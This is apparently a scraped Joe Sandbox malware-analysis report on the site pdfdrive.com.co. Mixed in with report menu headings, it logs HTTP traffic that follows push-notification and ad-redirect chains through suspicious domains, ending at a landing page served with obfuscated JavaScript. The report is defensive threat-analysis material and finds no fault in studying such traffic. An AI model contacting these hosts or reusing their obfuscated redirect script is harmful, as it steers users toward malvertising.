Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:27 UTC	1131	OUT	GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df51 HTTP/1.1 Host: want-some-psh.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:27 UTC	439	IN	HTTP/1.1 301 Moved Permanently Server: Angie Date: Fri, 10 Jan 2025 08:50:27 GMT Content-Length: 0 Connection: close Accept-Ch: Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Model, Sec-CH-UA-Bitness, Sec-CH-UA-Wow64 Referrer-Policy: no-referrer Location: https://cdn4image.com/creatives/888/527/192_0_1736428969326.png

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://pdfdrive.com.co

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Windows Analysis Report
http://pdfdrive.com.co

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:37 UTC	623	OUT	GET /push?clientId=1db9169f-90f4-4b2d-b517-bc47aab19c1f&clickId=oy2jl-meps1dn1ub8 HTTP/1.1 Host: fleraprt.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: / Origin: https://pdfdrive.com.co Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pdfdrive.com.co/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:37 UTC	467	IN	HTTP/1.1 200 OK Server: nginx/1.25.5 Date: Fri, 10 Jan 2025 08:50:37 GMT Content-Type: application/json; charset=utf-8 Content-Length: 12 Connection: close Access-Control-Allow-Origin: https://pdfdrive.com.co Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match Access-Control-Allow-Credentials: true
2025-01-10 08:50:37 UTC	12	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 30 7d Data Ascii: {"status":0}

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:38 UTC	418	OUT	GET /push?clientId=1db9169f-90f4-4b2d-b517-bc47aab19c1f&clickId=oy2jl-meps1dn1ub8 HTTP/1.1 Host: fleraprt.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:38 UTC	444	IN	HTTP/1.1 200 OK Server: nginx/1.25.5 Date: Fri, 10 Jan 2025 08:50:38 GMT Content-Type: application/json; charset=utf-8 Content-Length: 12 Connection: close Access-Control-Allow-Origin: Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match Access-Control-Allow-Credentials: true
2025-01-10 08:50:38 UTC	12	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 30 7d Data Ascii: {"status":0}

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:38 UTC	2599	OUT	GET /b2/l/c/redir?asid=3263414584SGiLPZHx&cid=5&did=RV1ST3s&eid=15328&n=f3f38a527a1ea99b2925c598&nid=10004&sid=maH16AVIvMiWF8nVqgoBWetUHKn0qeXN0D0vMNkKmpiqSGOaPrn6uIa88qdt6FQmro5CtGrTdE1Au4f3TUBBuk%2BoDw8BD%2Fmq5ByQ4ttTkIEZJbct48jGEXFqMfKq7%2BEswwytUeh%2FQ%2Fr9e42PtSg%2FpkjfiKcUk7GhOIgRYS3MAl6sFFkITyIUkF66cYEJQYvZ9JVO242IKPDCcEd7z7d9NQuMZ2n76g2sbSLqE6yMpyuGV%2BBmLKPl%2ByLfSAkAc5AQWuvrwMwmHOjymf9LWb8mo2%2BJdhy3Q11woi96q0fLIT5KwdgTkvnd%2F7PGgSwlNr3hkJfaO%2BAzDkbi09fiMEkfaB3k5vgMx1vBQJHD%2BCEJOlvauo6M6lQARnC7ZvArxHMMIZ7wgHsVxUb0%2FDY0DS%2F7amR8vD87W1WaHysq5iFWOp%2BRn3o%2BZEdxOQnVGS%2Fgqm4Di1BVUlqYrylQhK2lOuj64knKqeK77FuxIOj5Jx3XwTsuRS6avLcoRqaeVgB9kfnudiC%2FnioEq4hAI8OGBWgITJw8Agng6e7uMw9mqmY2DgEwd4MyT%2BhRTfBctOr12V50kJPqVkOB4%2FavFMi9fqPJaHA%2BwcMYz%2FhdhtHO%2FYJhDZ6LAJgKuuoBjQNwZL4L0UuCHML%2BwaithTZJw5LAjAzscXHNpFvbFGC5SyTgjXzb4XlOl600N%2F5yMl%2BuzJAAZobGTv7F%2Ba0YeSky%2F1j4kicLfs3Vp7pkEuKjbmdBzxrY%2By%2FBfEHmv3KxxuxN4cjqZbwjZfCTA%2FJUS5FwnfQBMSI2DxgBj%2FASb6Au1gg%2BsuZnREIJCk%2BtqGw9dSEJTNq3w8pDsgvD2q3nRtkF4 [TRUNCATED] Host: realpush.realsh.xyz Connection: keep-alive sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:39 UTC	239	IN	HTTP/1.1 200 OK Server: dspclick-v3.13.6.1 Date: Fri, 10 Jan 2025 08:50:38 GMT Content-Type: text/html Content-Length: 426 Set-Cookie: adcsid-c-3263414584SGiLPZHx=1; expires=Sat, 11 Jan 2025 08:50:39 GMT; path=/ Connection: close
2025-01-10 08:50:39 UTC	426	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 72 76 2e 65 75 2e 70 74 6d 6e 64 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 72 76 2e 65 75 2e 70 74 6d 6e 64 2e 63 6f 6d 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 Data Ascii: <!DOCTYPE html><html><head> <meta name="referrer" content="no-referrer"> <link rel="preconnect" href="https://srv.eu.ptmnd.com" crossorigin> <link rel="dns-prefetch" href="https://srv.eu.ptmnd.com"></head><body><script type="text/javascri

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:39 UTC	601	OUT	GET /favicon.ico HTTP/1.1 Host: realpush.realsh.xyz Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: adcsid-c-3263414584SGiLPZHx=1
2025-01-10 08:50:39 UTC	129	IN	HTTP/1.1 404 Not Found Server: dspclick-v3.13.6.1 Date: Fri, 10 Jan 2025 08:50:38 GMT Content-Length: 0 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:40 UTC	700	OUT	GET /v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/cl HTTP/1.1 Host: srv.eu.ptmnd.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:40 UTC	816	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:50:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8631 Connection: close Vary: Accept-Encoding Server: BunnyCDN-DE1-1077 CDN-PullZone: 1117336 CDN-Uid: 5ceed8e7-cd08-4fa9-9fd5-2c309512d291 CDN-RequestCountryCode: US Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Set-Cookie: JSESSIONID=A70CDCFC29427FFFBA231E6EA6D3FC7B; Path=/; HttpOnly Set-Cookie: ip-e6n8frthp82hfj80pfjp202lds=1; Max-Age=3600; Expires=Fri, 10 Jan 2025 09:50:40 GMT; Path=/ Referrer-Policy: no-referrer CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 01/10/2025 08:50:40 CDN-EdgeStorageId: 1048 CDN-Status: 200 CDN-RequestTime: 0 CDN-RequestId: 6ef9a1bc8d5f4ca50a41f98c49a1763f CDN-Cache: MISS
2025-01-10 08:50:40 UTC	8631	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 67 69 66 3b 62 61 73 65 36 34 2c 52 30 6c 47 4f 44 6c 68 41 51 41 42 41 49 41 41 41 41 41 41 41 50 2f 2f 2f 79 48 35 42 41 45 41 41 41 41 41 4c 41 41 41 41 41 41 42 41 Data Ascii: <!DOCTYPE html><html><head> <meta charSet="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <link rel="shortcut icon" href="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABA

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:40 UTC	660	OUT	POST /i/click HTTP/1.1 Host: srv.eu.ptmnd.com Connection: keep-alive Content-Length: 444 sec-ch-ua-platform: "Windows" Accept-Language: * sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: application/octet-stream sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Origin: https://srv.eu.ptmnd.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Cookie: JSESSIONID=A70CDCFC29427FFFBA231E6EA6D3FC7B; ip-e6n8frthp82hfj80pfjp202lds=1
2025-01-10 08:50:40 UTC	444	OUT	Data Raw: 1c 6a 63 44 5e 54 0a 55 40 49 45 7a 70 5c 46 40 0c 5c 40 49 45 7b 70 5c 46 13 01 5a 55 06 02 7f 63 4b 07 10 0a 0b 4f 54 56 2d 34 4b 5d 46 59 5a 4f 50 02 2a 62 04 5d 10 0a 0f 54 54 04 6a 7e 44 50 54 02 4f 53 47 4b 6a 67 44 5e 54 1a 41 40 53 45 72 70 54 55 41 01 5b 40 49 45 7f 70 5c 46 1f 48 40 0e 0c 00 20 26 48 0e 05 48 4f 4e 47 55 7a 70 5c 46 19 5a 07 07 06 13 6a 7e 44 56 42 1a 57 40 03 06 24 21 03 46 5a 1a 5f 54 47 5d 6a 34 07 08 05 5d 4f 4e 47 54 7d 70 5c 46 46 1a 41 40 56 51 6a 68 44 55 54 14 4f 56 5d 45 72 70 57 56 4e 08 4f 4e 47 53 71 70 5c 46 4e 00 54 40 49 45 7f 61 44 5e 54 7b 0c 0c 0b 08 3c 72 14 01 17 5c 4d 12 17 08 38 37 14 10 1f 5d 1e 42 0a 01 68 3c 13 08 1a 18 45 10 00 06 2c 3b 08 03 56 1f 1e 01 17 02 2d 3c 3e 43 5f 1a 41 40 54 57 7c 70 5c 46 Data Ascii: jcD^TU@IEzp\F@\@IE{p\FZUcKOTV-4K]FYZOP*b]TTj~DPTOSGKjgD^TA@SErpTUA[@IEp\FH@ &HHONGUzp\FZj~DVBW@$!FZ_TG]j4]ONGT}p\FFA@VQjhDUTOV]ErpWVNONGSqp\FNT@IEaD^T{<r\M87]Bh<E,;V-<>C_A@TW\|p\F
2025-01-10 08:50:40 UTC	601	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:50:40 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 857 Connection: close Vary: Accept-Encoding Server: BunnyCDN-DE1-1077 CDN-PullZone: 1117336 CDN-Uid: 5ceed8e7-cd08-4fa9-9fd5-2c309512d291 CDN-RequestCountryCode: US Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Referrer-Policy: no-referrer CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 200 CDN-CachedAt: 01/10/2025 08:50:40 CDN-EdgeStorageId: 1077 CDN-RequestTime: 0 CDN-RequestId: fc53afb8bda264815513b6a38c0bf13e
2025-01-10 08:50:40 UTC	857	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 77 61 6e 74 2d 73 6f 6d 65 2d 70 73 68 2e 6e 65 74 2f 63 6c 6b 2f 7a 76 5f 42 44 75 52 6f 34 59 6c 49 51 51 5f 5a 37 61 4e 35 36 32 63 6e 63 6e 71 54 56 68 65 5a 74 62 41 6d 4e 46 6e 37 4c 6c 4d 74 77 4a 41 4e 32 6b 6f 34 6a 6c 76 2d 73 31 77 53 35 33 42 55 57 50 43 58 57 76 7a 51 51 35 6a 6d 33 38 71 30 6c 59 41 45 33 5a 77 4c 6d 66 73 62 76 39 66 5a 46 4b 76 53 5f 34 44 6c 7a 38 43 32 71 6e 36 46 73 71 52 66 52 6d 38 46 35 2d 44 6b 30 5a 4b 65 55 55 50 73 2d 69 56 5a 62 49 4a 4f 74 6c 39 57 54 70 4b 7a 72 6c 78 48 34 62 53 7a 5a 56 72 4d 44 66 74 48 5f 76 6e 71 5a 69 6a 58 4a 42 44 74 67 79 69 66 76 76 45 52 67 58 33 34 49 66 67 78 51 30 63 31 54 63 70 37 45 39 50 79 45 77 6e 50 32 75 75 71 39 65 6d 44 74 4a 59 38 6f 41 43 36 73 Data Ascii: https://want-some-psh.net/clk/zv_BDuRo4YlIQQ_Z7aN562cncnqTVheZtbAmNFn7LlMtwJAN2ko4jlv-s1wS53BUWPCXWvzQQ5jm38q0lYAE3ZwLmfsbv9fZFKvS_4Dlz8C2qn6FsqRfRm8F5-Dk0ZKeUUPs-iVZbIJOtl9WTpKzrlxH4bSzZVrMDftH_vnqZijXJBDtgyifvvERgX34IfgxQ0c1Tcp7E9PyEwnP2uuq9emDtJY8oAC6s

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:41 UTC	1484	OUT	GET /clk/zv_BDuRo4YlIQQ_Z7aN562cncnqTVheZtbAmNFn7LlMtwJAN2ko4jlv-s1wS53BUWPCXWvzQQ5jm38q0lYAE3ZwLmfsbv9fZFKvS_4Dlz8C2qn6FsqRfRm8F5-Dk0ZKeUUPs-iVZbIJOtl9WTpKzrlxH4bSzZVrMDftH_vnqZijXJBDtgyifvvERgX34IfgxQ0c1Tcp7E9PyEwnP2uuq9emDtJY8oAC6sSom3TfPkAwScJmeY1NSIPNF7Fvsa9gPQCwADGERlKbiyUC7NHb0u9gX8qz2HX1B0OW7ZkyPUD_hH2zx8065u0HIIinHZEB3Ni1NluJZiXg_cWWPFFhWEXM7lXDBShKMx_U3WnX-DvJsz-b4jG-4HQjScnCy9Nsewm842sC635JWmX0X380v26uv1miZLYtpy6ewwHx8Yzg6OUufFKw8caFjuKUN5AuY8r02FLA2m-yNLi97BAn4giWK1-PuJjzuP19_FpG7luu-YWYugDBMnSNDbQdYwRU2x2gfQUOnqyv634lbbV8YIr8AzjrXLt1XVpxqsLBseTBp5iekUSXDj90wHh7vE6aE3KlClebKps9uQgsST2tK0vlCfBZS2ewhVAxpWEPM6drqMtkrX8tIK-M3eoXQMSlN6tYdjIECmTTwivnUdTtFK70cJD6wONuGAW0ZS8-epWpm4r-Ajj-7qwjwyD0xn8N0--QFQ3chZh7heP5PHmk_i47wC7Th7Ch8Lv6a2eqkLnoWdSXq3HK3o6ZrhnU-ZT4ksbFondtcF7NZdojl08Pexk-HeA4cOVgn8dz2_PaKf5zvFGAQnnUW_1rYFpM HTTP/1.1 Host: want-some-psh.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:42 UTC	629	IN	HTTP/1.1 302 Found Server: Angie Date: Fri, 10 Jan 2025 08:50:42 GMT Content-Length: 0 Connection: close Accept-Ch: Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Model, Sec-CH-UA-Bitness, Sec-CH-UA-Wow64 Referrer-Policy: no-referrer Location: https://open-2-view.com/index?cid=b795b5d29eff25c3bd93&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&cost=0.0416&t1=506894&t2=2851560&type=default&campaignid=888527&feedId=30&browser=Chrome&ageGroup=AGE_30_60&creativeId=2851560&creativeButton={creativeButton}

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:42 UTC	439	OUT	GET /i/click HTTP/1.1 Host: srv.eu.ptmnd.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID=A70CDCFC29427FFFBA231E6EA6D3FC7B; ip-e6n8frthp82hfj80pfjp202lds=1
2025-01-10 08:50:45 UTC	497	IN	HTTP/1.1 204 No Content Date: Fri, 10 Jan 2025 08:50:45 GMT Content-Type: text/html Connection: close Server: BunnyCDN-DE1-1048 CDN-PullZone: 1117336 CDN-Uid: 5ceed8e7-cd08-4fa9-9fd5-2c309512d291 CDN-RequestCountryCode: US Cache-Control: no-cache CDN-ProxyVer: 1.06 CDN-RequestPullSuccess: True CDN-RequestPullCode: 204 CDN-CachedAt: 01/10/2025 08:50:45 CDN-EdgeStorageId: 1075 CDN-Status: 204 CDN-RequestTime: 0 CDN-RequestId: 2ff39f825f697ad2a526af1d4ae6c4be CDN-Cache: MISS

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:45 UTC	917	OUT	GET /01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a7306d6dc00a35b3599344&scenario=2&img=1 HTTP/1.1 Host: cu0dup0hubcc73dr63tg.controlrushprotocol.co.in Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:45 UTC	242	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 10 Jan 2025 08:50:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000
2025-01-10 08:50:45 UTC	16142	IN	Data Raw: 63 36 31 30 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 73 68 72 69 6e 6b Data Ascii: c610<html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,shrink
2025-01-10 08:50:45 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 30 78 35 39 63 36 66 65 28 2b 2b 5f 30 78 34 62 61 37 61 61 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 30 78 35 61 66 65 30 35 29 20 72 65 74 75 72 6e 20 5f 30 78 35 39 63 36 66 65 3b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: } } _0x59c6fe(++_0x4ba7aa); } } try { if (_0x5afe05) return _0x59c6fe;
